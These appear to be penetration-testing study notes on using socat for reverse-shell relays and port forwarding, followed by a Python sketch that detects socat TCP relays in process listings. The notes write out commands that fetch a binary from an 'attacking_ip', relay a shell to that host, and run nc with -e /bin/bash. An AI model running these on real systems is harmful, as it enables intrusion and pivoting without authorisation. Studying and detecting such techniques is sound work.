socat

  • socat can be used for stable Linux shells and port forwarding

  • before using socat, it will usually be necessary to download a binary and then upload it to the target

    • sudo python3 -m http.server 80

    • then on the target: curl attacking_ip/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME

  • reverse shell relay

    • start a netcat listener on the attacking host

    • sudo nc -lvnp 443

    • then on the target run

    • ./socat tcp-l:8000 tcp:Attacking_IP:443 &

    • then we can create a reverse shell on the newly opened port using netcat

    • ./nc 127.0.0.1 8000 -e /bin/bash

  • port forwarding

    • easy

      • the easiest way is to open up a listening port on the compromised server, then redirect anything that comes in to the target server

      • ./socat tcp-l:33060,fork,reuseaddr tcp:<ip>:<port> &
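
From the defender's side, the relay and the port forward above leave the same trace: a socat process whose arguments pair a TCP listen address with a TCP connect address. The following is an added example (not part of the original notes) that flags that pattern in process listings; the sample lines, addresses and function names are constructed for illustration.

```python
import re
import shlex

# socat address keywords are case-insensitive. Only the TCP forms used on this
# page are covered; IPv6 literal destinations are out of scope for this sketch.
LISTEN_RE = re.compile(r"^tcp[46]?-l(?:isten)?:(\d+)((?:,[^,]+)*)$", re.I)
CONNECT_RE = re.compile(r"^tcp[46]?(?:-connect)?:([^:,]+):(\d+)(?:,.*)?$", re.I)
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample input: "PID USER COMMAND" lines, not real telemetry.
SAMPLE_PS = """\
812 root /usr/sbin/sshd -D
4410 www-data /tmp/socat-alice tcp-l:33060,fork,reuseaddr tcp:10.10.10.20:3306
4422 www-data ./socat TCP-L:8000 TCP:192.0.2.10:443
4500 backup /usr/bin/socat - unix-connect:/run/app.sock
"""


def parse_socat_relay(cmdline):
    """Return relay details for a socat TCP listen-to-connect pair, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a logged command line
        return None
    # Name-based match: a renamed binary needs hash or behaviour-based detection.
    if not argv or not argv[0].rsplit("/", 1)[-1].lower().startswith("socat"):
        return None
    listen = connect = None
    for arg in argv[1:]:
        listen = listen or LISTEN_RE.match(arg)
        connect = connect or CONNECT_RE.match(arg)
    if not (listen and connect):
        return None
    options = [o.lower() for o in listen.group(2).split(",") if o]
    return {
        "listen_port": int(listen.group(1)),
        "dest": (connect.group(1), int(connect.group(2))),
        "fork": "fork" in options,  # fork = long-lived, multi-connection forwarder
        "tmp_binary": argv[0].startswith(WORLD_WRITABLE),
    }


def find_relays(ps_text):
    """Scan 'PID USER COMMAND' lines and return [(pid, user, details), ...]."""
    hits = []
    for line in ps_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and (details := parse_socat_relay(parts[2])):
            hits.append((int(parts[0]), parts[1], details))
    return hits
```

A socat process that only bridges a local UNIX socket (the last sample line) is not flagged, which keeps the check focused on TCP-to-TCP forwarding.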
